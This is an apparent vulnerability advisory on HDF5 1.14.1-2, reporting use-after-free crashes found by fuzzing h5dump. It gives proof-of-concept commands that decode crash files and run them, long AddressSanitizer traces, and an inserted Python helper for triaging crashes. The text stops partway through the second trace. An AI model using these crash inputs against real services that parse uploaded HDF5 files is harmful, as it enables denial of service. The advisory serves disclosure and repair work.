HDF5 - Multiple Memory Corruption Vulnerabilities

Sep 20 2023

Pulse Security briefly assessed the HDF5 library (hdf5-1.14.1-2) for memory corruption vulnerabilities as part of a client engagement where the HDF5 library was used to parse potentially untrusted data. Multiple memory corruption issues were found in the HDF5 library by fuzz testing the h5stat and h5dump helper utilities.

Roughly 1 billion test cases were executed using AFL++ and test cases available in the HDF5 source repository as starting inputs. This resulted in 15 unique memory corruption vulnerabilities as determined by a major stack hash when the respective segmentation faults occurred. An input corpus generated by fuzzing h5stat was subsequently used to fuzz the h5dump utility, which uses more of the HDF5 library’s logic. 89 unique memory corruption issues were discovered in h5dump after executing approximately 10 million fuzzed test cases.

The input corpus and crashing testcases are included at the end of this advisory. Further memory corruption issues likely exist in HDF5, and the fuzz testing did not achieve complete coverage over the library’s code base. Integration with oss-fuzz was suggested to the HDF5 project.

Further research regarding the practical exploitability of these vulnerabilities against a modern operating system was not performed. The exploitability classifications in this advisory are based on rudimentary analysis of the crashing condition and verbatim output from the GDB exploitable plugin. For example, null pointer dereferences are less likely to be exploitable than a write-based heap overflow. This classification was included to help prioritise remediation and is not intended as commentary on the realistic practical exploitability of each crashing test case. Remediation of all memory corruption issues is recommended wherever possible, even without evidence of a weaponised exploit.
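The two triage steps described above, deduplicating crashes by a major stack hash of the faulting stack and assigning a coarse priority from the ASAN error class and access kind, as an added Python example (not code from Pulse Security, the HDF5 project, or the GDB exploitable plugin). The parser handles the report shape ASAN prints, including stripped frames and SEGV reports that carry no "READ of size" line; the sample reports are constructed for the example, reusing function names and source lines from the reports in this advisory but with invented addresses, pids and the example_* frames. The thresholds (first five frames, zero page below 0x1000) and the priority labels are this example's own choices, not the advisory's classification scheme.

```python
"""Triage helper for AddressSanitizer crash reports (added example; not from the
advisory or the HDF5 project). Groups crashes by a major stack hash and tags each
with a coarse priority. Sample reports below are constructed; the example_* frames
and all addresses are invented."""
import hashlib
import re
from dataclasses import dataclass

ERROR_RE = re.compile(r"AddressSanitizer: ([\w-]+) on (?:unknown )?address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+)")
SIGNAL_RE = re.compile(r"The signal is caused by a (READ|WRITE) memory access")
# "#N 0xADDR in func file:line" or, for stripped frames, "#N 0xADDR  (module+0xoff)"
FRAME_RE = re.compile(r"^\s+#\d+\s+0x[0-9a-f]+\s+(?:in\s+(\S+)\s+)?(\S+)")


@dataclass(frozen=True)
class Crash:
    error: str       # ASAN error class, e.g. "heap-use-after-free" or "SEGV"
    address: int     # faulting address
    access: str      # "READ", "WRITE" or "" if the report did not say
    size: int        # access size in bytes (0 for SEGV reports)
    frames: tuple    # faulting stack, innermost first
    major: tuple     # frames the hash is computed over
    stack_hash: str


def parse_asan(report: str, major_frames: int = 5) -> Crash:
    """Parse one report; only the faulting stack counts, not the 'freed by' /
    'previously allocated by' stacks that follow it."""
    error, address, access, size, frames = "", 0, "", 0, []
    for line in report.splitlines():
        if not error:
            m = ERROR_RE.search(line)
            if m:
                error, address = m.group(1), int(m.group(2), 16)
            continue
        if not frames:
            m = ACCESS_RE.match(line) or SIGNAL_RE.search(line)
            if m:
                access = m.group(1)
                size = int(m.group(2)) if m.re is ACCESS_RE else 0
                continue
        m = FRAME_RE.match(line)
        if m:
            frames.append(m.group(1) or m.group(2))
        elif frames:
            break  # first non-frame line after the stack ends it
    if not error or not frames:
        raise ValueError("not a recognisable ASAN report")
    # Sanitizer interceptors (memmove, memcpy, ...) say nothing about the bug itself;
    # hash the first program frames beneath them so the same bug hit at different
    # addresses or through different inputs lands in one bucket.
    major = tuple(f for f in frames if not f.startswith("__interceptor_"))[:major_frames]
    digest = hashlib.sha256("|".join(major).encode()).hexdigest()[:16]
    return Crash(error, address, access, size, tuple(frames), major, digest)


def rough_priority(crash: Crash) -> str:
    """Coarse ordering for remediation planning, not an exploitability verdict."""
    if crash.error == "SEGV" and crash.address < 0x1000:
        return "low"      # fault on the zero page: null dereference
    if crash.access == "WRITE":
        return "high"     # write into freed or out-of-bounds memory
    if crash.error in ("heap-use-after-free", "heap-buffer-overflow"):
        return "medium"   # read of freed / out-of-bounds heap memory
    return "unknown"


def dedupe(reports):
    """Group reports by major stack hash: {hash: [Crash, ...]}."""
    buckets = {}
    for crash in map(parse_asan, reports):
        buckets.setdefault(crash.stack_hash, []).append(crash)
    return buckets


# Constructed samples that mimic the shape of ASAN output (addresses invented).
UAF_A = """\
==1001==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f0000001887 at pc 0x7f0000002b34 bp 0x7ffd00000e10 sp 0x7ffd00000e08
READ of size 1 at 0x7f0000001887 thread T0
    #0 0x7f0000002b33 in H5T__conv_f_f /src/H5Tconv.c:4428
    #1 0x7f000000687a in H5T_convert /src/H5T.c:5449
    #2 0x7f0000009489 in H5T__conv_struct /src/H5Tconv.c:2308
    #3 0x7f0000008b3b in H5D__scatgath_read /src/H5Dscatgath.c:545
    #4 0x55f600000abc  (/opt/hdf5/bin/h5dump+0x5b46c)

0x7f0000001887 is located 565383 bytes inside of 1454108-byte region
freed by thread T0 here:
    #0 0x7f000000fb6f in __interceptor_free ../asan_malloc_linux.cpp:123
"""
# Same bug, different run: only the pid and addresses differ, so the hash must match.
UAF_B = UAF_A.replace("==1001==", "==1002==").replace("0x7f0000001887", "0x7f0000005a10")
UAF_C = """\
==1003==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f000000081c at pc 0x7f0000006541 bp 0x7fff00000ea0 sp 0x7fff00000650
READ of size 407088 at 0x7f000000081c thread T0
    #0 0x7f0000006540 in __interceptor_memmove ../sanitizer_common_interceptors.inc:789
    #1 0x7f0000001b7f in H5T__conv_struct_opt /src/H5Tconv.c:2599
    #2 0x7f000000d87a in H5T_convert /src/H5T.c:5449
    #3 0x7f000000fb3b in H5D__scatgath_read /src/H5Dscatgath.c:545
"""
SEGV_NULL = """\
==1004==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x7f0000003000 bp 0x7ffd00000a00 sp 0x7ffd000009f0 T0)
==1004==The signal is caused by a READ memory access.
==1004==Hint: address points to the zero page.
    #0 0x7f0000002fff in example_read_header /src/example.c:42
    #1 0x7f0000001234 in example_open /src/example.c:10
"""

if __name__ == "__main__":
    for h, crashes in dedupe([UAF_A, UAF_B, UAF_C, SEGV_NULL]).items():
        c = crashes[0]
        print(f"{h}  x{len(crashes)}  {c.error:<20} {c.access:<5} {rough_priority(c):<7} {c.major[0]}")
```

Hashing only the first few in-program frames is what makes the "unique crash" counts meaningful: the two H5T__conv_f_f samples differ only in addresses and collapse into one bucket, while the memmove-interceptor frame in the third sample is skipped so the hash reflects H5T__conv_struct_opt rather than the sanitizer runtime. The priority tag is deliberately blunt; it orders a backlog, it does not replace the exploitability analysis the advisory says was not done.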

Where HDF5 is used to process user-supplied data in a server-side application, such as a mechanism that allows users to upload h5 files, these memory corruption vulnerabilities may be used to trigger a denial of service condition. Further exploit development may allow for remote code execution under this scenario.

The tables and summaries below were sent to the HDFGroup, and the five specific memory corruption issues were reported via the newly set up GitHub security advisory page. All testcases and input corpora were provided to HDFGroup. These vulnerabilities remain unresolved in HDF5 at the time of this advisory release.

Use After Free

Summary

An attacker who can control an h5 file parsed by HDF5 can trigger heap use-after-free conditions. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the use-after-free bugs against modern operating systems.

Impact

An attacker who can control an h5 file or other hdf5 data parsed by a target system can trigger the use-after-free. With the proof-of-concepts below, this could result in denial-of-service conditions in server-side implementations of the HDF5 library.

Use-after-free vulnerabilities may result in remote code execution, depending on the specific exploitability of the vulnerability. Real-world exploitability of this issue in terms of remote-code execution is currently unknown.

H5T__conv_f_f Use After Free

Details

The following heap-use-after-free was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object was allocated, freed and subsequently used in a READ operation from H5T__conv_f_f.

PoC

The following PoC shows the ASAN output detailing the use-after-free condition.

$ echo "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" | base64 -d | gunzip -c > f73304be7d3e45624d4f6651c0688b35 
$ ./hdf5/bin/h5dump f73304be7d3e45624d4f6651c0688b35 
HDF5 "f73304be7d3e45624d4f6651c0688b35" {
GROUP "/" {
   DATASET "ArrayOfStrucbures" {
      DATATYPE  H5T_COMPOUND {
         32-bit little-endian integer 32-bit precision "a_name";
         11632864-bit big-endian floating-point 32-bit precision "b_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 1;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            H5T_ARRAY { [62978] undefined bitfield } "array_name";
         } "d_name";
      }
      DATASPACE  SIMPLE { ( 254 ) / ( 254 ) }
=================================================================
==1235==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f0561b9b887 at pc 0x7f056ae87b34 bp 0x7ffda79b4e10 sp 0x7ffda79b4e08
READ of size 1 at 0x7f0561b9b887 thread T0
    #0 0x7f056ae87b33 in H5T__conv_f_f /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428
    #1 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #2 0x7f056ae79489 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2308
    #3 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #4 0x7f056aa28b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #5 0x7f056a9e6221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #6 0x7f056aa1c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #7 0x7f056afd1ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #8 0x7f056afa1afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #9 0x7f056afa1afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #10 0x7f056a990a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #11 0x7f056a998444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #12 0x55f6883c946c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #13 0x55f6883de18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #14 0x55f688397c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #15 0x55f6883a0947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #16 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #17 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #18 0x7f056ab8c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #19 0x7f056a906721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #20 0x7f056a90a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #21 0x7f056ab9ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #22 0x7f056ab933d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #23 0x7f056ab7dd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #24 0x7f056ac35c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #25 0x7f056afdd455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #26 0x7f056afb4095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #27 0x7f056afb4095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #28 0x7f056ac2161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #29 0x7f056ac2161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #30 0x55f688396be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #31 0x55f68838f1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #32 0x7f056a538d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #33 0x55f688391649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7f0561b9b887 is located 565383 bytes inside of 1454108-byte region [0x7f0561b11800,0x7f0561c7481c)
freed by thread T0 here:
    #0 0x7f056b38fb6f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:123
    #1 0x7f056ae8711a in H5T__conv_f_f /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4848
    #2 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f056ae79489 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2308
    #4 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f056aa28b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f056a9e6221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f056aa1c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f056afd1ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f056afa1afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f056afa1afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f056a990a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f056a998444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x55f6883c946c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x55f6883de18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x55f688397c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x55f6883a0947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f056ab8c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f056a906721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f056a90a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f056ab9ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f056ab933d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f056ab7dd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f056ac35c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f056afdd455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f056afb4095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f056afb4095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f056ac2161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f056ac2161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x55f688396be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x55f68838f1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f056a538d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

previously allocated by thread T0 here:
    #0 0x7f056b390037 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
    #1 0x7f056ae85a86 in H5T__conv_f_f /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4388
    #2 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f056ae79489 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2308
    #4 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f056aa28b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f056a9e6221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f056aa1c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f056afd1ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f056afa1afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f056afa1afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f056a990a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f056a998444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x55f6883c946c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x55f6883de18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x55f688397c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x55f6883a0947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f056ab8c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f056a906721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f056a90a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f056ab9ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f056ab933d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f056ab7dd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f056ac35c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f056afdd455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f056afb4095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f056afb4095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f056ac2161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f056ac2161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x55f688396be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x55f68838f1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f056a538d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-use-after-free /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
Shadow bytes around the buggy address:
  0x0fe12c36b6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b6d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0fe12c36b710:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b730: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b750: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b760: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1235==ABORTING

H5T__conv_struct_opt Use After Free

Details

The following heap-use-after-free was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct_opt. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term.

PoC

The following PoC shows the ASAN output detailing the use-after-free condition.

$ echo "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" | base64 -d | gunzip -c > 77d3cad25d20e9298344223c8d2d0eaa
$ ./hdf5/bin/h5dump 77d3cad25d20e9298344223c8d2d0eaa 
HDF5 "77d3cad25d20e9298344223c8d2d0eaa" {
GROUP "/" {
   DATASET "ArrayOfStructures" {
      DATATYPE  H5T_COMPOUND {
         H5T_STD_I32LE "a_name";
         H5T_IEEE_F32LE "m_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 1;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            H5T_ARRAY { [33924] 96-bit little-endian floating-point 32-bit precision } "array_name";
         } "d_name";
      }
      DATASPACE  SIMPLE { ( 254 ) / ( 254 ) }
=================================================================
==1205==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f790a85081c at pc 0x7f7910e96541 bp 0x7fff5e17aea0 sp 0x7fff5e17a650
READ of size 407088 at 0x7f790a85081c thread T0
    #0 0x7f7910e96540 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
    #1 0x7f79109f1b7f in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2599
    #2 0x7f79109bd87a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f79109f2171 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
    #4 0x7f79109bd87a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f791059fb3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f791055d221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f79105935d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f7910b48ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f7910b18afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f7910b18afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f7910507a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f791050f444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x558ffe91546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x558ffe92a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x558ffe8e3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x558ffe8ec947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f7910703212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f791047d721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f791048105e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f7910711c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f791070a3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f79106f4d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f79107acc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f7910b54455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f7910b2b095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f7910b2b095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f791079861a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f791079861a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x558ffe8e2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x558ffe8db1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f79100afd09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #34 0x558ffe8dd649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7f790a865808 is located 0 bytes to the right of 1048584-byte region [0x7f790a765800,0x7f790a865808)
freed by thread T0 here:
    #0 0x7f7910f06b6f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:123
    #1 0x7f79106aed3e in H5FL__blk_gc_list /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1203
